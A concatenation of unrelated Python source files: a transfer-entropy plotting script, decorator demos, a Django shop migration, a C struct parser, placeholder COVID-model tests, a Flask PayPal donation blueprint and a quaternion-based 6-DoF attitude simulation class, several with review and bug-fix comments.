            for j,nbrs2 in G.adjacency_iter():
                if h in dTE and i in dTE[h] and j in dTE[h][i]:
                    if G.node[i]['role'] == 'S':
                        dTE_S += dTE[h][i][j]
                        SCount += 1
                    elif G.node[i]['role'] == 'M':
                        dTE_M += dTE[h][i][j]
                        MCount += 1
        if SCount == 0:
            SM[h] = 0
        else:
            # NOTE(review): only SCount is guarded -- if SCount > 0 while
            # MCount == 0 this raises ZeroDivisionError.
            average_dTE_S = float(dTE_S)/float(SCount)
            average_dTE_M = float(dTE_M)/float(MCount)
            SM[h] = average_dTE_S - average_dTE_M
            print SM[h]
    return SM
# Plot the S-M curve across time delays (Python 2 script).
# NOTE(review): this rebinds the name SM from the function to its result.
SM = SM(G, dTE, timedelay_range)
x = SM.keys()
y = SM.values()
fig, ax = plt.subplots()
line1, = ax.plot(x, y, linewidth=1,)
plt.axis([0, 20, -0.10, 0.50])
fig.suptitle('Sensor - Motor Value ', fontsize=14)
plt.ylabel('SM Value')
plt.xlabel('Time Delay h')
plt.show()
'''
def HL(G, dTE, timedelay):
HL = {}
for h in range(1, timedelay):
dTE_high = 0
dTE_low = 0
highCount = 0
lowCount = 0
HL[h] = {}
for i,nbrs1 in G.adjacency_iter():
for j,nbrs2 in G.adjacency_iter():
if h in dTE and i in dTE[h] and j in dTE[h][i]:
#print G.node[i]['degreeClass']
if G.node[i]['degreeClass'] == 'High':
dTE_high += dTE[h][i][j]
highCount += 1
else:
dTE_low += dTE[h][i][j]
lowCount += 1
if highCount == 0:
HL[h] = 0
else:
average_dTE_high = float(dTE_high)/float(highCount)
average_dTE_low = float(dTE_low)/float(lowCount)
HL[h] = average_dTE_high - average_dTE_low
return HL
HL = HL(G, dTE, timedelay_range)
with open('data/randomResults/HLdata_chem.txt', 'wb') as f:
pickle.dump(HL, f)
x = HL.keys()
y = HL.values()
fig, ax = plt.subplots()
line1, = ax.plot(x, y, linewidth=1,)
plt.axis([0, 20, -0.20, 0.20])
fig.suptitle('Hub - Non-Hub Value ', fontsize=14)
plt.ylabel('HN Value')
plt.xlabel('Time Delay h')
plt.show()
'''
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
# Collect the multiples of 3 from 1..9.
# FIX: renamed from ``list``/``list2`` so the built-in ``list`` is no
# longer shadowed.
numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9]
multiples_of_three = [i for i in numbers if i % 3 == 0]
print(multiples_of_three)
import time
# Decorator that forwards arbitrary positional/keyword arguments
def deco(func):
    """Decorator: time each call and print the elapsed milliseconds.

    BUGFIX: the wrapper now returns the wrapped function's result; the
    original discarded it (every decorated call returned None).
    """
    def wrapper(*args, **kwargs):
        startTime = time.time()
        result = func(*args, **kwargs)
        endTime = time.time()
        msecs = (endTime - startTime) * 1000
        print ("time is {0} ms ".format(msecs))
        return result
    return wrapper
@deco
def func(a,b):
    """Timing demo: greet, sleep one second, print a + b (returns None)."""
    print ("hello, here is a func for add :")
    time.sleep(1)
    print ("result is %d"%(a+b))
@deco
def func2(a,b,c):
    """Timing demo: greet, sleep one second, print a + b + c (returns None)."""
    print ("hello,here is a func for add:")
    time.sleep(1)
    print ("result is %d"%(a+b+c))
def deco01(func):
    """Outer demo decorator: prints entry/exit markers and wall-clock time."""
    def wrapper(*args, **kwargs):
        print("this is deco01")
        started = time.time()
        func(*args, **kwargs)
        elapsed_ms = (time.time() - started) * 1000
        print("time is %d ms" % elapsed_ms)
        print("deco01 end here")
    return wrapper
def deco02(func):
    """Inner demo decorator: announces entry and exit around the call.

    The wrapped function's return value is intentionally discarded,
    matching the sibling decorators in this demo.
    """
    def wrapper(*args, **kwargs):
        print("this is deco02")
        func(*args, **kwargs)
        print("deco02 end here")
    return wrapper
# Multiple decorators stacked: deco01 wraps deco02, which wraps func3.
@deco01
@deco02
def func3(a,b):
    """Stacked-decorator demo: greet, sleep one second, print a + b."""
    print("hello,here is a func for add :")
    time.sleep(1)
    print("result is %d" %(a+b))
if __name__=='__main__':
    # Only the stacked-decorator demo is active; earlier experiments are
    # kept as comments.
    #f=func
    #func2(3,4,5)
    # f(3,4)
    func3(4,5)
|
# Generated by Django 2.2.3 on 2019-11-01 19:31
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: widens several address/contact fields on
    # ``order`` and adds optional colour/size fields to the basket/order
    # product models.
    # NOTE(review): the 'emial' verbose_name below is a typo preserved from
    # generation time; historical migrations should not be edited, fix it
    # on the model and in a new migration instead.
    dependencies = [
        ('basket', '0001_initial'),
    ]
    operations = [
        migrations.AlterField(
            model_name='order',
            name='customer_apartment',
            field=models.CharField(blank=True, max_length=30, null=True, verbose_name='Квартира'),
        ),
        migrations.AlterField(
            model_name='order',
            name='customer_dist',
            field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Улица'),
        ),
        migrations.AlterField(
            model_name='order',
            name='customer_email',
            field=models.EmailField(max_length=254, verbose_name='emial'),
        ),
        migrations.AlterField(
            model_name='order',
            name='customer_house',
            field=models.CharField(blank=True, max_length=30, null=True, verbose_name='Дом'),
        ),
        migrations.AlterField(
            model_name='order',
            name='customer_locality',
            field=models.CharField(blank=True, max_length=30, null=True, verbose_name='Населенный пункт'),
        ),
        migrations.AlterField(
            model_name='productinbasket',
            name='color',
            field=models.CharField(blank=True, max_length=30, null=True, verbose_name='Цвет'),
        ),
        migrations.AlterField(
            model_name='productinbasket',
            name='size',
            field=models.CharField(blank=True, max_length=30, null=True, verbose_name='Размер'),
        ),
        migrations.AlterField(
            model_name='productinorders',
            name='color',
            field=models.CharField(blank=True, max_length=30, null=True, verbose_name='Цвет'),
        ),
        migrations.AlterField(
            model_name='productinorders',
            name='size',
            field=models.CharField(blank=True, max_length=30, null=True, verbose_name='Размер'),
        ),
    ]
|
#!/usr/bin/env python3
from structurefield import StructureField
import re
# TODO: replace by libclang
# Precompiled patterns for stripping C source down to bare declarations.
__comments_multiline_re = re.compile(r'/\*.*?\*/', re.DOTALL)
__comments_singleline_re = re.compile(r'//.*$', re.MULTILINE)
__unused_keywords_re = re.compile(r'static|const|extern|inline|virtual|volatile|typedef|__attribute__\(\(.*\)\)')
__extra_spaces_re = re.compile(r'[\s]+')


def remove_comments(code):
    """Strip // line comments, then /* */ block comments, from ``code``."""
    without_line_comments = __comments_singleline_re.sub("", code)
    return __comments_multiline_re.sub("", without_line_comments)


def remove_keywords(code):
    """Drop storage-class / qualifier keywords irrelevant to field layout."""
    return __unused_keywords_re.sub("", code)


def remove_spaces(code):
    """Collapse every run of whitespace into a single space."""
    return __extra_spaces_re.sub(" ", code)
def find_matching_paren(code, open_paren='{', close_paren='}'):
    ''' Returns the index of the closing parenthesis matching the opening one. '''
    # Depth counter over the whole string; the first index where the depth
    # is zero is reported.  NOTE: if code[0] is not a parenthesis, depth is
    # already zero there, so index 0 is returned (original behaviour).
    depth = 0
    for index, ch in enumerate(code):
        if ch == open_paren:
            depth += 1
        elif ch == close_paren:
            depth -= 1
        if depth == 0:
            return index
    return -1
def find_first_substructure(code):
    """ Returns the indexes of the first embedded structure found in the declarations. """
    start = code.find('{')
    if start < 0:
        # No embedded struct present.
        return (-1, -1)
    end = find_matching_paren(code)
    if end < 0:
        raise SyntaxError("invalid syntax - no match for opening parenthesis "
                          "in '{0}', start: {1}".format(code, start))
    return (start, end)
def get_struct_name(code, start_subexpr, end_subexpr):
    """ Get the name of a structure given the positions of its open & close parentheses.

    The "name" is stitched from the text between the previous ';' and '{'
    (the ``struct Tag`` part) plus the text between '}' and the next ';'
    (the instance name).  Returns (index of preceding ';', index just past
    the trailing ';', stripped name).
    """
    struct_name = ""
    # find expression just before this struct
    prev_expr = code.rfind(';', 0, start_subexpr)
    if prev_expr != -1:
        name_start = prev_expr + 1
        struct_name += code[name_start : start_subexpr - 1]
    # does not handle the case of this struct being the first substruct in the code
    # the calling function takes care to not include the enclosing struct declaration
    elif start_subexpr > 0:
        struct_name += code[:start_subexpr - 1]
    # find expression just after this struct
    next_expr = code.find(';', end_subexpr)
    if next_expr != -1:
        name_end = next_expr
        struct_name += code[end_subexpr + 1 : name_end]
        # Advance past the ';' so the caller can resume parsing after it.
        next_expr += 1
    else:
        raise SyntaxError("semicolon missing at end of structure - "
                          "'{0}'".format(code[prev_expr+1:]))
    struct_name = struct_name.lstrip().rstrip()
    return (prev_expr, next_expr, struct_name)
def parse_expr(code):
    """ Parse a set of declarations and return a list of StructureFields.
    Partitions the declaration into 3 -
    before first sub-structure, first sub-structure, and after first sub-structure.
    Then recursively calls itself to parse the partitioned bits.
    struct ABC { char c; struct XYZ { int b; char y; } myXYZ; int l; } myABC;
              ^                     ^               ^        ^
              1                     2               3        4
    1 - prev_expr
    2 - start_substruct
    3 - end_substruct
    4 - next_expr
    """
    fields_list = []
    code = code.lstrip().rstrip()
    if len(code) == 0:
        return fields_list
    (start_substruct, end_substruct) = find_first_substructure(code)
    # no substructures found
    if start_substruct == -1:
        # Flat declaration list: one field per ';'-terminated statement
        # (the trailing empty split element is dropped).
        fields = code.split(';')[:-1]
        # FIXME: handle comma separated fields
        # FIXME: handle unions
        fields_list = [ StructureField.create_from_string(f) for f in fields]
        return fields_list
    (prev_expr, next_expr, struct_name) = get_struct_name(code, start_substruct, end_substruct)
    # Recurse on the three partitions; a nested struct becomes a
    # (name, fields) tuple inside the flat field list.
    fields_list.extend(parse_expr(code[:prev_expr + 1]))
    struct_fields = parse_expr(code[start_substruct + 1:end_substruct])
    fields_list.append((struct_name, struct_fields))
    fields_list.extend(parse_expr(code[next_expr:]))
    return fields_list
def parse_c_struct(code):
    """ Parses a C structure declaration to generate a list of fields. """
    # Normalise newlines, then strip comments, qualifier keywords and
    # excess whitespace before handing the flattened declaration to the
    # recursive parser.
    normalised = code.replace('\r', '\n')
    for cleanup in (remove_comments, remove_keywords, remove_spaces):
        normalised = cleanup(normalised)
    return parse_expr(normalised)
|
from datetime import date
from unittest import mock
import numpy as np
import pytest
from summer.model import CompartmentalModel
# from autumn.projects.covid_19.mixing_optimisation import mixing_opti as opti
# from autumn.projects.covid_19.mixing_optimisation import write_scenarios
# from autumn.projects.covid_19.mixing_optimisation.constants import OPTI_REGIONS, PHASE_2_START_TIME
from autumn.settings import Region
@pytest.mark.mixing_optimisation
def test_dummy_placeholder():
    # Keeps the mixing_optimisation marker registered while the real tests
    # below remain commented out.
    pass
#
#
# @pytest.mark.local_only
# @pytest.mark.parametrize("region", Region.MIXING_OPTI_REGIONS)
# @mock.patch("models.covid_19.mixing_optimisation.mixing_opti.PHASE_2_START_TIME", 100)
# def test_run_root_models_partial(region):
# """
# Smoke test: ensure we can build and run each root model with nothing crashing.
# """
# model = opti.run_root_model(region)
# assert type(model) is CompartmentalModel
# assert model.outputs is not None
#
#
# @pytest.mark.github_only
# @pytest.mark.mixing_optimisation
# @pytest.mark.parametrize("region", Region.MIXING_OPTI_REGIONS)
# def test_run_root_models_full(region):
# """
# Smoke test: ensure we can build and run each root model with nothing crashing.
# """
# model = opti.run_root_model(region)
# assert type(model) is CompartmentalModel
# assert model.outputs is not None
#
#
# AGE_GROUPS = [
# "0",
# "5",
# "10",
# "15",
# "20",
# "25",
# "30",
# "35",
# "40",
# "45",
# "50",
# "55",
# "60",
# "65",
# "70",
# "75",
# ]
# AVAILABLE_MODES = [
# "by_age",
# "by_location",
# ]
# AVAILABLE_DURATIONS = ["six_months", "twelve_months"]
# DECISION_VARS = {
# "by_age": [1 for _ in range(len(AGE_GROUPS))],
# "by_location": [1, 1, 1],
# }
#
#
# @pytest.mark.mixing_optimisation
# @pytest.mark.github_only
# @pytest.mark.parametrize("duration", AVAILABLE_DURATIONS)
# @pytest.mark.parametrize("mode", AVAILABLE_MODES)
# def test_full_optimisation_iteration_for_uk(mode, duration):
# country = Region.UNITED_KINGDOM
# root_model = opti.run_root_model(country)
# h, d, yoll = opti.objective_function(DECISION_VARS[mode], root_model, mode, country, duration)
# assert h in (True, False)
# assert d >= 0
# assert yoll >= 0
#
#
# @pytest.mark.parametrize("duration", AVAILABLE_DURATIONS)
# @pytest.mark.parametrize("mode", AVAILABLE_MODES)
# def test_build_params_for_phases_2_and_3__smoke_test(mode, duration):
# opti.build_params_for_phases_2_and_3(
# DECISION_VARS[mode], elderly_mixing_reduction=None, duration=duration, mode=mode
# )
#
#
# @mock.patch("models.covid_19.mixing_optimisation.mixing_opti.Scenario")
# def test_objective_function_calculations(mock_scenario_cls):
# root_model = mock.Mock()
# sc_model = mock.Mock()
# mock_scenario_cls.return_value.model = sc_model
# phase_2_days = 183
# phase_3_days = 14 + 10
# num_timesteps = PHASE_2_START_TIME + phase_2_days + phase_3_days
# sc_model.times = np.array(range(num_timesteps))
# sc_model.derived_outputs = {
# # Expect 55 deaths as sum of vals.
# "infection_deaths": np.concatenate(
# [np.zeros(PHASE_2_START_TIME), np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])],
# ),
# # Expect 108 yoll as sum of vals.
# "years_of_life_lost": np.concatenate(
# [np.zeros(PHASE_2_START_TIME), np.array([1, 3, 5, 7, 9, 11, 13, 17, 19, 23])],
# ),
# # Expect immunity because incidence decreasing
# "incidence": np.concatenate(
# [
# np.zeros(PHASE_2_START_TIME + phase_2_days + 14),
# np.array([10, 9, 8, 7, 6, 5, 4, 3, 2, 1]),
# ],
# ),
# }
# # Expect 10% immune.
# sc_model.compartment_names = ["a", "b_recovered", "c_recovered"]
# sc_model.outputs = np.zeros([num_timesteps, 3])
# sc_model.outputs[PHASE_2_START_TIME + phase_2_days, 0] = 90
# sc_model.outputs[PHASE_2_START_TIME + phase_2_days, 1] = 3
# sc_model.outputs[PHASE_2_START_TIME + phase_2_days, 2] = 7
#
# decision_variables = [1 for _ in range(len(AGE_GROUPS))]
# (herd_immunity, total_nb_deaths, years_of_life_lost,) = opti.objective_function(
# decision_variables,
# root_model,
# mode="by_age",
# country="france",
# duration="six_months",
# )
# assert herd_immunity
# assert total_nb_deaths == 55
# assert years_of_life_lost == 108
#
#
# @pytest.mark.xfail
# def test_build_params_for_phases_2_and_3__with_location_mode_and_microdistancing():
# scenario_params = opti.build_params_for_phases_2_and_3(
# decision_variables=[2, 3, 5],
# elderly_mixing_reduction=None,
# duration="six_months",
# mode="by_location",
# )
# loc_dates = [date(2020, 7, 31), date(2021, 1, 31), date(2021, 2, 1)]
#
# assert scenario_params == {
# "time": {
# "start": 213,
# "end": 669,
# },
# "mobility": {
# "age_mixing": {},
# "microdistancing": {"behaviour": {"parameters": {"sigma": 1.0}}},
# "mixing": {
# "other_locations": {
# "times": loc_dates,
# "values": [2, 2, 1.0],
# "append": False,
# },
# "school": {
# "times": loc_dates,
# "values": [3, 3, 1.0],
# "append": False,
# },
# "work": {
# "times": loc_dates,
# "values": [5, 5, 1.0],
# "append": False,
# },
# },
# },
# "importation": {
# "props_by_age": None,
# "movement_prop": None,
# "quarantine_timeseries": {"times": [], "values": []},
# "case_timeseries": {
# "times": [397, 398, 399, 400],
# "values": [0, 5, 5, 0],
# },
# },
# }
#
#
# @pytest.mark.xfail
# def test_build_params_for_phases_2_and_3__with_age_mode():
# scenario_params = opti.build_params_for_phases_2_and_3(
# decision_variables=[i for i in range(16)],
# elderly_mixing_reduction=None,
# duration="six_months",
# mode="by_age",
# )
# age_dates = [date(2020, 7, 31), date(2020, 8, 1), date(2021, 1, 31), date(2021, 2, 1)]
# loc_dates = [date(2020, 7, 31), date(2021, 1, 31), date(2021, 2, 1)]
#
# assert scenario_params == {
# "time": {
# "start": 213,
# "end": 669,
# },
# "mobility": {
# "age_mixing": {
# "0": {"values": [1, 0, 0, 1], "times": age_dates},
# "5": {"values": [1, 1, 1, 1], "times": age_dates},
# "10": {"values": [1, 2, 2, 1], "times": age_dates},
# "15": {"values": [1, 3, 3, 1], "times": age_dates},
# "20": {"values": [1, 4, 4, 1], "times": age_dates},
# "25": {"values": [1, 5, 5, 1], "times": age_dates},
# "30": {"values": [1, 6, 6, 1], "times": age_dates},
# "35": {"values": [1, 7, 7, 1], "times": age_dates},
# "40": {"values": [1, 8, 8, 1], "times": age_dates},
# "45": {"values": [1, 9, 9, 1], "times": age_dates},
# "50": {"values": [1, 10, 10, 1], "times": age_dates},
# "55": {"values": [1, 11, 11, 1], "times": age_dates},
# "60": {"values": [1, 12, 12, 1], "times": age_dates},
# "65": {"values": [1, 13, 13, 1], "times": age_dates},
# "70": {"values": [1, 14, 14, 1], "times": age_dates},
# "75": {"values": [1, 15, 15, 1], "times": age_dates},
# },
# "mixing": {
# "other_locations": {
# "times": loc_dates,
# "values": [1.0, 1.0, 1.0],
# "append": False,
# },
# "school": {
# "times": loc_dates,
# "values": [1.0, 1.0, 1.0],
# "append": False,
# },
# "work": {
# "times": loc_dates,
# "values": [1.0, 1.0, 1.0],
# "append": False,
# },
# },
# },
# "importation": {
# "props_by_age": None,
# "movement_prop": None,
# "quarantine_timeseries": {"times": [], "values": []},
# "case_timeseries": {
# "times": [397, 398, 399, 400],
# "values": [0, 5, 5, 0],
# },
# },
# }
"""
Test write_scenarios module
"""
#
# @pytest.mark.mixing_optimisation
# def test_read_optimised_variables():
# test_file = "dummy_vars_for_test.csv"
# df = write_scenarios.read_opti_outputs(test_file)
# decision_vars = write_scenarios.read_decision_vars(
# df, "france", "by_age", "six_months", "deaths"
# )
# assert decision_vars == [0.99] * 16
#
#
# @pytest.mark.mixing_optimisation
# def test_build_all_scenarios():
# test_file = "dummy_vars_for_test.csv"
# all_sc_params = write_scenarios.build_all_scenario_dicts_from_outputs(test_file)
#
# assert set(list(all_sc_params.keys())) == set(OPTI_REGIONS)
#
# assert list(all_sc_params["france"].keys()) == [1, 9]
#
# assert list(all_sc_params["france"][1].keys()) == ["time", "mobility", "parent"]
|
import paypalrestsdk
from flask import Blueprint, jsonify, request, current_app as app, redirect, url_for
from paypalrestsdk import Payment, ResourceNotFound
from backend.auth import with_user
from backend.blueprints.project import find_project_or_404
from backend.models import Donation
from backend.schemas import donation_schema
paypal_api = Blueprint('PayPalApi', __name__, url_prefix='/paypal')
@paypal_api.before_request
def setup_paypal():
    """Configure the PayPal SDK from the Flask app config before each request
    to this blueprint (mode, client id and client secret)."""
    # sets up paypal before the request is fired
    paypalrestsdk.configure({
        'mode': app.config['PAYPAL']['mode'],
        'client_id': app.config['PAYPAL']['client_id'],
        'client_secret': app.config['PAYPAL']['client_secret']
    })
@paypal_api.route('/create-payment', methods=['POST'])
@with_user
def create_payment(current_user):
    """Create a PayPal payment for a project donation.

    Validates the posted donation data, creates the PayPal payment, persists a
    Donation record and returns the PayPal approval URL the client must visit.
    Returns 400 on missing data, 422 on validation errors, 409 when PayPal
    rejects the payment and 502 when PayPal returns no approval link.
    """
    data = request.json
    if not data:
        return jsonify({'message': 'No data given'}), 400
    if current_user is not None:  # if it is None then it's an anonymous donation
        data['donator_id'] = str(current_user.id)
    else:
        data['donator_id'] = None  # make sure it's set to None, otherwise user can manipulate which user donated
    # load and validate (partial: paypal_payment_id is only known after creation)
    result = donation_schema.load(data, partial=True)
    if len(result.errors) > 0:
        return jsonify({'errors': result.errors}), 422
    project = find_project_or_404(result.data['project_id'])
    payment = Payment({
        'intent': 'sale',
        'payer': {
            'payment_method': 'paypal'
        },
        'redirect_urls': {
            'return_url': url_for('.success', _external=True),  # result.data['return_url'],
            'cancel_url': url_for('.cancel', _external=True),  # result.data['cancel_url'],
        },
        'transactions': [
            {
                'amount': {
                    'total': '%.2f' % result.data['amount'],
                    'currency': 'EUR',
                },
                'description': "Regalos Project Donation.",
                'item_list': {
                    'items': [
                        {
                            'name': 'Project Donation',
                            'description': 'Donation to {project_title}'.format(
                                project_title=project.title),
                            'price': '%.2f' % result.data['amount'],
                            'currency': 'EUR',
                            'quantity': '1',
                        }
                    ]
                }
            }
        ]
    })
    if payment.create():
        result.data['paypal_payment_id'] = payment.id
        # BUG FIX: keep the result of the full (non-partial) validation -- the
        # original discarded this load and re-checked the stale errors object.
        result = donation_schema.load(result.data)
        if len(result.errors) > 0:
            return jsonify({'errors': result.errors}), 422
        del result.data['project_id']
        del result.data['donator_id']
        new_donation = Donation(**result.data)
        new_donation.save()
        for link in payment.links:
            if link.rel == 'approval_url':
                return jsonify({
                    'message': 'Donation created!',
                    'approval_url': str(link.href),
                    'donation': donation_schema.dump(new_donation).data
                })
        # BUG FIX: the original fell off the loop and implicitly returned None
        # (a 500) when PayPal sent no approval_url link.
        return jsonify({'message': 'No approval URL returned by PayPal'}), 502
    else:
        return jsonify({
            'message': 'Could not create paypal payment',
            'error': payment.error
        }), 409
@paypal_api.route('/success')  # callback from PayPal API
def success():
    """PayPal return-URL callback: execute the approved payment and, on
    success, mark the matching Donation as SUCCESS and add its amount to the
    project budget. Redirects back to the frontend in every outcome."""
    if 'paymentId' in request.args and 'PayerID' in request.args:
        try:
            payment = Payment.find(request.args['paymentId'])  # type: Payment
            # BUG FIX: check execute()'s result -- the original ignored it and
            # marked the donation SUCCESS (and bumped the budget) even when the
            # execution failed on PayPal's side.
            if payment.execute({'payer_id': request.args['PayerID']}):
                donation = Donation.objects(paypal_payment_id=request.args['paymentId']).first()  # type: Donation
                if donation is not None:
                    donation.project.current_budget += donation.amount
                    donation.status = str(Donation.Status.SUCCESS)
                    donation.project.save()
                    donation.save()
                # redirected to frontend again
                return redirect('http://localhost:3000/donation/success')
            return redirect('http://localhost:3000/donation/failed')
        except ResourceNotFound:
            return redirect('http://localhost:3000/donation/failed')
    else:
        return jsonify({'message': 'No payment details given'}), 422
@paypal_api.route('/cancel')  # callback from PayPal API
def cancel():
    """PayPal cancel-URL callback: mark the donation CANCELLED when its id is
    known, then redirect back to the frontend."""
    # TODO: paymentId is not given for cancel requests, find another way to set the donation to CANCELLED
    if 'paymentId' in request.args:
        # BUG FIX: fetch a single document with .first() -- the original
        # compared a QuerySet to None (always "not None") and then set
        # attributes on the QuerySet instead of on a Donation.
        donation = Donation.objects(paypal_payment_id=request.args['paymentId']).first()
        if donation is not None:
            donation.status = str(Donation.Status.CANCELLED)
            donation.save()
    return redirect('http://localhost:3000/donation/cancel')
|
# -*- coding: utf-8 -*-
"""6自由度機体シミュレーション用のクラス."""
import numpy as np
from numpy.linalg import inv
from math import sin, cos, pi, sqrt
import math_function as mf
class Attitude6DoF(object):
    """Quaternion-based attitude and rigid-body state for a 6-DoF simulation.

    The attitude quaternion is stored as [q0, q1, q2, q3] with
    q_hat = cos(theta/2) + n_vec * sin(theta/2).

    BUG FIXES vs the original:
      * updateQuartanion called the nonexistent ``derivativeOfQuartanion``
        (the method is ``calcDerivativeOfQuartanion``) -> AttributeError.
      * updateOmegaBody called the nonexistent ``derivativeOfOmegaBody``
        (the method is ``calcDerivativeOfOmegaBody``) -> AttributeError.
      * removed a leftover debug print in calcDerivativeOfOmegaBody.
    """

    def __init__(self):
        """Initialize at rest with the identity attitude."""
        super(Attitude6DoF, self).__init__()
        self.velocityBody = np.array([0.0, 0.0, 0.0])   # translational velocity, body frame
        self.quartanion = np.array([1.0, 0.0, 0.0, 0.0])
        # [q0, q1, q2, q3] q_hat = cos(theta/2) + vec_n * sin(theta / 2)
        self.omegaBody = np.array([0.0, 0.0, 0.0])      # angular velocity, body frame
        self.momentOfInertia = np.array([
            [0.001, 0, 0],
            [0, 0.0001, 0],
            [0, 0, 0.00020633122]
        ])
        self.weight = 0.1                               # mass [kg] (name kept for compatibility)
        self.position = np.array([0.0, 0.0, 0.0])       # position, inertial frame

    def setQuartanionFrom(self, roll, pitch, yaw):
        """Set the attitude quaternion from Euler angles and return it."""
        self.quartanion = mf.euler2Quartanion(roll, pitch, yaw)
        return self.quartanion

    def rotationOfPositionVector(self, r):
        """Rotate a position vector by the current rotation quaternion.

        If the quaternion represents the body attitude, this maps a body-frame
        vector into the inertial frame.

        Raises RuntimeError when r is not three-dimensional.
        """
        if len(r) != 3:
            raise RuntimeError("Inputted vector must be three dimentional.")
        q = self.quartanion
        # Direction-cosine matrix assembled from the quaternion components.
        A11 = q[0]**2+q[1]**2-q[2]**2-q[3]**2
        A12 = 2*(q[1]*q[2]-q[0]*q[3])
        A13 = 2*(q[1]*q[3]+q[0]*q[2])
        A21 = 2*(q[1]*q[2]+q[0]*q[3])
        A22 = q[0]**2-q[1]**2+q[2]**2-q[3]**2
        A23 = 2*(q[2]*q[3]-q[0]*q[1])
        A31 = 2*(q[1]*q[3]-q[0]*q[2])
        A32 = 2*(q[2]*q[3]+q[0]*q[1])
        A33 = q[0]**2-q[1]**2-q[2]**2+q[3]**2
        A = np.array([
            [A11, A12, A13],
            [A21, A22, A23],
            [A31, A32, A33]
        ])
        rRotated = np.dot(A, r)
        return rRotated

    def bodyVector2InertialVector(self, r):
        """Express a body-frame vector in inertial-frame components."""
        return self.rotationOfPositionVector(r)

    def inertialVector2BodyVector(self, r):
        """Express an inertial-frame vector in body-frame components
        (the transpose/inverse rotation of rotationOfPositionVector).

        Raises RuntimeError when r is not three-dimensional.
        """
        if len(r) != 3:
            raise RuntimeError("Position vector must be three dimentional.")
        q = self.quartanion
        q0 = q[0]
        q1 = q[1]
        q2 = q[2]
        q3 = q[3]
        A = np.array([
            [q0**2+q1**2-q2**2-q3**2, 2*(q1*q2+q0*q3), 2*(q1*q3-q0*q2)],
            [2*(q1*q2-q0*q3), q0**2-q1**2+q2**2-q3**2, 2*(q2*q3+q0*q1)],
            [2*(q1*q3+q0*q2), 2*(q2*q3-q0*q1), q0**2-q1**2-q2**2+q3**2]
        ])
        rRotated = np.dot(A, r)
        return rRotated

    def calcDerivativeOfQuartanion(self, omega_inertial):
        """Time derivative of the quaternion for a rotation at angular
        velocity omega (inertial frame).

        Raises RuntimeError when omega_inertial is not three-dimensional.
        """
        if len(omega_inertial) != 3:
            raise RuntimeError("Angular velocity must be three dimentional.")
        w = omega_inertial
        q = self.quartanion
        # q_dot = 0.5 * Omega(w) * q
        w_hat = 0.5 * np.array([
            [0, -w[0], -w[1], -w[2]],
            [w[0], 0, -w[2], w[1]],
            [w[1], w[2], 0, -w[0]],
            [w[2], -w[1], w[0], 0]
        ])
        qDot = np.dot(w_hat, q)
        return qDot

    def normOfQuartanion(self):
        """Return the quaternion norm (1 by definition for a rotation
        quaternion; used to re-normalize after numerical integration)."""
        q = self.quartanion
        norm = sqrt(q[0]**2+q[1]**2+q[2]**2+q[3]**2)
        return norm

    def updateQuartanion(self, omega_body, dt):
        """Integrate the quaternion over dt from a body-frame angular rate
        and return the (re-normalized) result."""
        omega_inertial = self.rotationOfPositionVector(omega_body)
        # BUG FIX: was self.derivativeOfQuartanion (method does not exist).
        qDot = self.calcDerivativeOfQuartanion(omega_inertial)
        self.quartanion += np.dot(dt, qDot)          # explicit Euler step
        self.quartanion /= self.normOfQuartanion()   # re-normalize
        return self.quartanion

    def updateQuartanionODE(self, quartanion):
        """Replace the quaternion with one produced by a scipy ODE solver,
        re-normalizing it."""
        self.quartanion = quartanion
        self.quartanion /= self.normOfQuartanion()   # re-normalize
        return self.quartanion

    def calcDerivativeOfOmegaBody(self, moment_body):
        """Angular acceleration (body frame) from an applied moment via
        Euler's rigid-body equation: I*dw/dt = M - w x (I*w)."""
        w = self.omegaBody
        I_body = self.momentOfInertia
        I_inv = inv(I_body)
        M = moment_body
        h = np.dot(I_body, w)  # angular momentum
        dwdt = np.dot(I_inv, (M - np.cross(w, h)))
        # (debug print removed)
        return dwdt

    def updateOmegaBody(self, dt, moment_body):
        """Integrate the body angular rate over dt from an applied moment."""
        # BUG FIX: was self.derivativeOfOmegaBody (method does not exist).
        self.omegaBody += np.dot(dt, self.calcDerivativeOfOmegaBody(moment_body))
        return self.omegaBody

    # TODO: translational equations of motion

    def gravityBody(self):
        """Gravity force resolved into body-frame components for the current
        attitude (weight attribute is the mass)."""
        g_inertial = np.array([0.0, 0.0, 9.81])
        g_body = self.inertialVector2BodyVector(g_inertial)
        return g_body * self.weight

    def calcDerivativeOfVelocityBody(self, force_body):
        """Time derivative of the body-frame velocity from a body-frame force:
        dv/dt = F/m - w x v."""
        w = self.omegaBody
        vc = self.velocityBody
        F = force_body
        m = self.weight
        dvcdt = np.dot(F, 1/m) - np.cross(w, vc)
        return dvcdt

    def getVelocityInertial(self):
        """Return the velocity expressed in the inertial frame."""
        vel_inertial = self.bodyVector2InertialVector(self.velocityBody)
        return vel_inertial
def testRotation(omega):
    """Integrate a constant angular rate for one second (1000 Euler steps)
    and return the rotated x/y/z basis vectors."""
    att = Attitude6DoF()
    nx = np.zeros(3, dtype=float)
    ny = np.zeros(3, dtype=float)
    nz = np.zeros(3, dtype=float)
    step = 1 / 1000
    for _ in range(1000):
        att.updateQuartanion(omega, step)
        nx = att.rotationOfPositionVector(np.array([1, 0, 0]))
        ny = att.rotationOfPositionVector(np.array([0, 1, 0]))
        nz = att.rotationOfPositionVector(np.array([0, 0, 1]))
    return nx, ny, nz
def testinertialVector2BodyVector():
    """Verify inertialVector2BodyVector against an explicit z-axis rotation
    matrix: for a pure yaw, inertial->body is a rotation of -yaw about z."""
    yaw = pi/3
    theta = pi/6
    inertial_to_body = np.array([
        [cos(-yaw), -sin(-yaw), 0],
        [sin(-yaw), cos(-yaw), 0],
        [0, 0, 1]
    ])
    x_inertial = np.array([cos(theta), sin(theta), 0.0])
    xb_answer = np.dot(inertial_to_body, x_inertial)
    att = Attitude6DoF()
    # Quaternion for a rotation of `yaw` about the z axis.
    att.quartanion = np.array([cos(yaw/2), 0.0*sin(yaw/2), 0.0*sin(yaw/2), 1.0*sin(yaw/2)])
    xb_test = att.inertialVector2BodyVector(x_inertial)
    print(f'error: {xb_test},{xb_answer}')
    print(f'error: {np.cross(xb_test,xb_answer)}')
# Manual smoke tests: integrate a full revolution (2*pi rad/s for one second)
# about each axis / axis combination and print the rotated basis vectors.
